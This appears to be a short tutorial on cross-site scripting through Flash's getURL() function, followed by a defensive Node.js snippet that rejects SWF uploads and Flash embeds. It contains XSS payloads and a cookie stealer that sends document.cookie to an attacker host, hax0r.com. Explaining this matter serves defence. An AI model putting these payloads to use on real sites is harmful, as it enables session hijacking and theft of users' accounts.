Flash is used for complex animations, simulations, creation of games, etc.
What's interesting for us is the getURL() action.
This function allows us to redirect the end user to another page.
Its syntax is as follows:
getURL(url:String, [window: String,[method:String]])
Example:
getURL("http://victime.com/login.php?logout=true","_self");
url: the URL of the site
window: specifies the window or frame in which the request takes place (_self, _blank…)
method: the request method, GET or POST (GET by default)
Here is how ActionScript and JavaScript are combined to display an alert:
getURL("javascript:alert('XSS')");
In 2002, the danger of this feature was demonstrated;
for example, visitors' cookies could be displayed in this manner:
getURL("javascript:alert(document.cookie)")
In December 2005, a new variant appeared. It combined a non-persistent XSS flaw
with the possibility of placing a Flash file in one's signature to obtain a persistent XSS.
Moreover, the author of this variant used the technique
to infect MySpace with an XSS worm derived from Samy's: Samy Reloaded.
A cookie stealer in Flash?
No, but there is a technique to do it.
Example, in a Flash file:
getURL("http://www.victime.com/page.php?var=<script src='http://www.hax0r.com/Haxored.js'></script>","_self");
And in Haxored.js:
document.location="http://hax0r.com/cookiestealer.php?cookie="+document.cookie;
To secure against this, the simple solution: do not allow Flash files in your web app.
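One way to enforce the "no Flash files" rule on the server, as an added example that is not part of the original post: it rejects uploads by SWF signature rather than by name, and rejects user markup that embeds Flash. It assumes Node.js; the function names, reason strings and sample inputs are constructed for illustration.

```javascript
// Added example (Node.js). Function names and reason strings are hypothetical.
const SWF_MAGICS = ["FWS", "CWS", "ZWS"]; // uncompressed, zlib, LZMA SWF headers

// True if the bytes start with an SWF signature, whatever the filename or
// Content-Type claims. Fails closed: the 3-byte magic alone is enough.
function isSwf(body) {
  if (!Buffer.isBuffer(body) || body.length < 3) return false;
  return SWF_MAGICS.includes(body.toString("latin1", 0, 3));
}

// Coarse reject filter for user-supplied markup (signatures, comments).
// It belongs in front of an allowlist HTML sanitizer, not instead of one.
function embedsFlash(html) {
  const s = String(html).toLowerCase();
  return /<\s*(object|embed)\b/.test(s) ||
    s.includes("application/x-shockwave-flash") ||
    /\.swf\b/.test(s);
}

// Collects every reason a submission would bring Flash into the application.
function checkSubmission({ filename = "", contentType = "", body, signatureHtml = "" }) {
  const reasons = [];
  if (isSwf(body)) reasons.push("upload has SWF header");
  if (/\.swf$/i.test(filename.trim())) reasons.push("upload has .swf extension");
  if (/shockwave-flash/i.test(contentType)) reasons.push("upload declared as Flash");
  if (embedsFlash(signatureHtml)) reasons.push("markup embeds Flash");
  return { allowed: reasons.length === 0, reasons };
}

// Constructed samples: an SWF header sent as "avatar.gif", a signature that
// embeds a Flash file, and a genuine GIF header.
const renamedSwf = Buffer.concat([Buffer.from("CWS", "latin1"), Buffer.from([9, 0x20, 0, 0, 0])]);
const realGif = Buffer.from("GIF89a", "latin1");
console.log(checkSubmission({ filename: "avatar.gif", contentType: "image/gif", body: renamedSwf }));
console.log(checkSubmission({ signatureHtml: '<embed src="http://example.test/sig.swf">' }));
console.log(checkSubmission({ filename: "avatar.gif", contentType: "image/gif", body: realGif }));
```

Checking the leading bytes matters because a Flash file renamed to an image extension passes name and MIME-type checks unchanged.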